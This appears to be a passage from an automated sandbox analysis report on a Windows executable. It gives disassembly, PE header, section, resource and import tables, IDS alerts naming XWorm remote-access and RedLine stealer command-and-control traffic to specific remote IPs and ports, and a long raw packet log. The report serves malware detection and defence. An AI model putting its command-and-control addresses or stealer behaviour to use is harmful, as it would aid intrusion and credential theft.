                                                                                call 00007FAD787DC587h
                                                                                mov dword ptr [esi], 0042B220h
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                mov dword ptr [ecx], 0042B220h
                                                                                jmp 00007FAD787DC63Ch
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                mov esi, ecx
                                                                                mov dword ptr [esi], 0042B220h
                                                                                call 00007FAD787DC629h
                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                je 00007FAD787DC909h
                                                                                push esi
                                                                                call 00007FAD787D9357h
                                                                                pop ecx
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                push edi
                                                                                mov edi, dword ptr [ebp+08h]
                                                                                mov eax, dword ptr [edi+04h]
                                                                                test eax, eax
                                                                                je 00007FAD787DC949h
                                                                                lea edx, dword ptr [eax+08h]
                                                                                cmp byte ptr [edx], 00000000h
                                                                                je 00007FAD787DC941h
                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                mov ecx, dword ptr [esi+04h]
                                                                                cmp eax, ecx
                                                                                je 00007FAD787DC916h
                                                                                add ecx, 08h
                                                                                push ecx
                                                                                push edx
                                                                                call 00007FAD787DFDB3h
                                                                                pop ecx
                                                                                pop ecx
                                                                                test eax, eax
                                                                                je 00007FAD787DC906h
                                                                                xor eax, eax
                                                                                jmp 00007FAD787DC926h
                                                                                test byte ptr [esi], 00000002h
                                                                                je 00007FAD787DC907h
                                                                                test byte ptr [edi], 00000008h
                                                                                je 00007FAD787DC8F4h
                                                                                mov eax, dword ptr [ebp+10h]
                                                                                mov eax, dword ptr [eax]
                                                                                test al, 01h
                                                                                je 00007FAD787DC907h
                                                                                test byte ptr [edi], 00000001h
                                                                                je 00007FAD787DC8E6h
                                                                                test al, 02h
                                                                                je 00007FAD787DC907h
                                                                                test byte ptr [edi], 00000002h
                                                                                je 00007FAD787DC8DDh
                                                                                xor eax, eax
                                                                                inc eax
                                                                                pop edi
                                                                                pop esi
                                                                                pop ebp
                                                                                ret
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                mov eax, dword ptr [ebp+08h]
                                                                                mov eax, dword ptr [eax]
                                                                                mov eax, dword ptr [eax]
                                                                                cmp eax, 00004F4Dh

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [ASM] VS2008 SP1 build 30729
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [C++] VS2008 SP1 build 30729
                                                                                • [EXP] VS2008 SP1 build 30729
                                                                                • [LNK] VS2008 SP1 build 30729

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x2efa00x33.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2db7c0xdc.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x510000x519a.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x2a3f00x1c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cc100x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x384.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x2878a0x28800d06d79869523ea3421d1bec81acb4dd3False0.5987172067901234data6.719347478322136IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x2a0000x4fd30x5000ae7c16bd625a124b8fbf6ecc9002c4ffFalse0.398388671875data5.389979228626923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x2f0000x214280x16006754819d963e719555064632286f5a0dFalse0.33824573863636365data3.465549868754234IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x510000x519a0x5200cbf1086fcb5bb60c381a8a8be59ad95dFalse0.5894150152439024data6.176452024873748IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_BITMAP0x514bc0xbb6Device independent bitmap graphic, 93 x 302 x 4, 2 compression, image size 2894, resolution 2835 x 2835 px/mEnglishUnited States0.2581721147431621
                                                                                RT_ICON0x520740x1fc2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9785977859778597
                                                                                RT_DIALOG0x540380x286dataEnglishUnited States0.5030959752321982
                                                                                RT_DIALOG0x542c00x13adataEnglishUnited States0.6050955414012739
                                                                                RT_DIALOG0x543fc0xecdataEnglishUnited States0.6991525423728814
                                                                                RT_DIALOG0x544e80x12edataEnglishUnited States0.5860927152317881
                                                                                RT_DIALOG0x546180x338dataEnglishUnited States0.44538834951456313
                                                                                RT_DIALOG0x549500x252dataEnglishUnited States0.5757575757575758
                                                                                RT_STRING0x54ba40x1e2dataEnglishUnited States0.3900414937759336
                                                                                RT_STRING0x54d880x1ccdataEnglishUnited States0.4282608695652174
                                                                                RT_STRING0x54f540x1eedataEnglishUnited States0.451417004048583
                                                                                RT_STRING0x551440x146dataEnglishUnited States0.5153374233128835
                                                                                RT_STRING0x5528c0x446dataEnglishUnited States0.340036563071298
                                                                                RT_STRING0x556d40x166dataEnglishUnited States0.49162011173184356
                                                                                RT_STRING0x5583c0x120dataEnglishUnited States0.5451388888888888
                                                                                RT_STRING0x5595c0xbadataEnglishUnited States0.4946236559139785
                                                                                RT_STRING0x55a180xa2dataEnglishUnited States0.6049382716049383
                                                                                RT_GROUP_ICON0x55abc0x14data1.2
                                                                                RT_MANIFEST0x55ad00x6caXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4090909090909091

                                                                                Imports

                                                                                DLLImport
                                                                                COMCTL32.dllInitCommonControlsEx
                                                                                SHLWAPI.dllSHAutoComplete
                                                                                KERNEL32.dllFindClose, FindNextFileW, FindFirstFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, GetModuleFileNameW, FindResourceW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetCurrentProcessId, GetLocaleInfoW, GetNumberFormatW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, WaitForSingleObject, GetDateFormatW, GetTimeFormatW, FileTimeToSystemTime, FileTimeToLocalFileTime, GetExitCodeProcess, GetTempPathW, MoveFileExW, UnmapViewOfFile, Sleep, MapViewOfFile, GetCommandLineW, CreateFileMappingW, GetTickCount, OpenFileMappingW, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, CreateThread, GetProcessAffinityMask, CreateEventW, CreateSemaphoreW, ReleaseSemaphore, ResetEvent, SetEvent, SetThreadPriority, SystemTimeToFileTime, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, LocalFileTimeToFileTime, WideCharToMultiByte, MultiByteToWideChar, CompareStringW, IsDBCSLeadByte, SetFileTime, SetFileAttributesW, SetCurrentDirectoryW, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetLocaleInfoA, GetStringTypeW, GetStringTypeA, LoadLibraryA, GetConsoleMode, GetConsoleCP, InitializeCriticalSectionAndSpinCount, QueryPerformanceCounter, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleHandleA, LCMapStringW, LCMapStringA, IsValidCodePage, GetOEMCP, GetACP, GetModuleFileNameA, ExitProcess, HeapSize, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, VirtualAlloc, VirtualFree, HeapCreate, InterlockedDecrement, GetCurrentThreadId, InterlockedIncrement, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStartupInfoA, GetCommandLineA, RaiseException, GetFileAttributesW, FlushFileBuffers, ReadFile, GetFileType, SetEndOfFile, SetFilePointer, WriteFile, GetStdHandle, GetLongPathNameW, GetShortPathNameW, GlobalAlloc, MoveFileW, CreateFileW, CreateDirectoryW, DeviceIoControl, RemoveDirectoryW, DeleteFileW, CreateHardLinkW, GetCurrentProcess, CloseHandle, SetLastError, GetLastError, CreateFileA, GetCPInfo, GetSystemTimeAsFileTime, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind
                                                                                USER32.dllEnableWindow, GetDlgItem, ShowWindow, SetWindowLongW, GetDC, ReleaseDC, FindWindowExW, GetParent, MapWindowPoints, CreateWindowExW, UpdateWindow, LoadCursorW, RegisterClassExW, DefWindowProcW, DestroyWindow, CopyRect, IsWindow, CharUpperW, OemToCharBuffA, LoadIconW, LoadBitmapW, PostMessageW, GetSysColor, SetForegroundWindow, MessageBoxW, WaitForInputIdle, IsWindowVisible, DialogBoxParamW, DestroyIcon, SetFocus, GetClassNameW, SendDlgItemMessageW, EndDialog, GetDlgItemTextW, SetDlgItemTextW, wvsprintfW, SendMessageW, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, LoadStringW, GetWindowRect, GetClientRect, SetWindowPos, GetWindowTextW, SetWindowTextW, GetSystemMetrics, GetWindow, GetWindowLongW
                                                                                GDI32.dllGetDeviceCaps, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, StretchBlt, DeleteDC, GetObjectW, DeleteObject, CreateDIBSection
                                                                                COMDLG32.dllGetSaveFileNameW, CommDlgExtendedError, GetOpenFileNameW
                                                                                ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegSetValueExW, RegCloseKey, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges
                                                                                SHELL32.dllSHBrowseForFolderW, ShellExecuteExW, SHGetSpecialFolderLocation, SHFileOperationW, SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHGetFileInfoW
                                                                                ole32.dllCLSIDFromString, CoCreateInstance, OleInitialize, OleUninitialize, CreateStreamOnHGlobal
                                                                                OLEAUT32.dllVariantInit

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                07/16/24-21:08:49.732554TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M270004974645.88.186.18192.168.2.4
                                                                                07/16/24-21:09:07.854397TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497467000192.168.2.445.88.186.18
                                                                                07/16/24-21:07:40.914617TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497467000192.168.2.445.88.186.18
                                                                                07/16/24-21:09:07.853192TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes70004974645.88.186.18192.168.2.4
                                                                                07/16/24-21:09:00.501675TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497467000192.168.2.445.88.186.18

                                                                                Suricata IDS Alerts

                                                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                2024-07-16T21:07:40.914617+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound497467000192.168.2.445.88.186.18
                                                                                2024-07-16T21:07:27.212960+0200TCP2033967ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)49745443192.168.2.4149.154.167.220
                                                                                2024-07-16T21:07:13.916186+0200TCP2848200ETPRO MALWARE RedLine - GetUpdates Request497389336192.168.2.4147.185.221.20
                                                                                2024-07-16T21:08:49.732554+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M270004974645.88.186.18192.168.2.4
                                                                                2024-07-16T21:09:07.854397+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497467000192.168.2.445.88.186.18
                                                                                2024-07-16T21:07:11.118991+0200TCP2045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound933649730147.185.221.20192.168.2.4
                                                                                2024-07-16T21:07:08.760906+0200TCP2840787ETPRO HUNTING Request for config.json49735443192.168.2.423.32.185.164
                                                                                2024-07-16T21:09:07.853192+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes70004974645.88.186.18192.168.2.4
                                                                                2024-07-16T21:07:07.874705+0200TCP2045000ET MALWARE RedLine Stealer - CheckConnect Response933649730147.185.221.20192.168.2.4
                                                                                2024-07-16T21:07:08.324582+0200TCP2046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)933649730147.185.221.20192.168.2.4
                                                                                2024-07-16T21:07:08.868628+0200TCP2835930ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI)49736443192.168.2.4104.26.12.31
                                                                                2024-07-16T21:07:09.279083+0200TCP2835929ETPRO POLICY External IP Address Lookup via api.ip .sb49736443192.168.2.4104.26.12.31
                                                                                2024-07-16T21:07:27.532720+0200TCP2045615ET HUNTING Telegram API Request (GET)49745443192.168.2.4149.154.167.220
                                                                                2024-07-16T21:07:27.532720+0200TCP2853685ETPRO MALWARE Win32/XWorm Checkin via Telegram49745443192.168.2.4149.154.167.220
                                                                                2024-07-16T21:07:11.505252+0200TCP2849352ETPRO MALWARE RedLine - SetEnvironment Request497379336192.168.2.4147.185.221.20
                                                                                2024-07-16T21:07:27.217238+0200TCP2029322ET HUNTING Telegram API Certificate Observed44349745149.154.167.220192.168.2.4
                                                                                2024-07-16T21:09:00.501675+0200TCP2853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound497467000192.168.2.445.88.186.18
                                                                                2024-07-16T21:07:08.872910+0200TCP2833693ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb))44349736104.26.12.31192.168.2.4
                                                                                2024-07-16T21:07:58.125604+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974720.12.23.50192.168.2.4
                                                                                2024-07-16T21:07:19.836796+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973920.12.23.50192.168.2.4
                                                                                2024-07-16T21:07:08.369249+0200UDP2835928ETPRO POLICY External IP Address Lookup DNS Query (api .ip .sb)5338553192.168.2.41.1.1.1
                                                                                2024-07-16T21:07:02.736165+0200TCP2849662ETPRO MALWARE RedLine - CheckConnect Request497309336192.168.2.4147.185.221.20
                                                                                2024-07-16T21:07:08.182096+0200TCP2849351ETPRO MALWARE RedLine - EnvironmentSettings Request497309336192.168.2.4147.185.221.20
                                                                                2024-07-16T21:07:26.559583+0200UDP2033966ET HUNTING Telegram API Domain in DNS Lookup6196253192.168.2.41.1.1.1

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 16, 2024 21:07:02.134418964 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:02.139592886 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:02.139731884 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:02.207060099 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:02.212352037 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:02.564506054 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:02.569716930 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:02.683413982 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:02.736165047 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:02.818061113 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:02.861217022 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:07.866453886 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:07.874705076 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.009381056 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.009540081 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:08.014436960 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.181982040 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.182043076 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.182096004 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:08.272368908 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.272519112 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.272550106 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.272563934 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:08.314138889 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:08.324582100 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:08.376636982 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.113349915 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.114181995 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.118990898 CEST933649730147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.119051933 CEST497309336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.119100094 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.119165897 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.119765043 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.124605894 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.470743895 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476042032 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476106882 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476109028 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476167917 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476174116 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476198912 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476227045 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476247072 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476255894 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476280928 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476285934 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476300001 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476314068 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476334095 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476341963 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476361990 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476375103 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.476377010 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.476723909 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.481967926 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.481997967 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.482017040 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.482049942 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.482050896 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.482080936 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.482109070 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.482114077 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.482137918 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.482144117 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.482165098 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.482175112 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.504602909 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.505251884 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511132002 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511213064 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511276007 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511334896 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511352062 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511396885 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511410952 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511485100 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511784077 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511811972 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511837006 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511840105 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511857033 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511868954 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511884928 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511920929 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511949062 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511971951 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.511976957 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.511990070 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512006998 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512032032 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512046099 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512057066 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512085915 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512134075 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512135983 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512164116 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512206078 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512217999 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512247086 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512295008 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512296915 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512326956 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512373924 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512376070 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512403965 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512450933 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512608051 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512636900 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512665033 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512685061 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512691975 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.512717009 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.512736082 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516057968 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516102076 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516258955 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516273022 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516315937 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516318083 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516330004 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516357899 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516371012 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516374111 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516386032 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516401052 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516411066 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516419888 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516454935 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516458035 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516469002 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516495943 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516514063 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516526937 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516536951 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516573906 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516586065 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516616106 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516623020 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516628027 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516668081 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516681910 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516695023 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516721964 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516736984 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.516755104 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516767025 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.516809940 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.517215014 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517273903 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.517321110 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517345905 CEST933649737147.185.221.20192.168.2.4
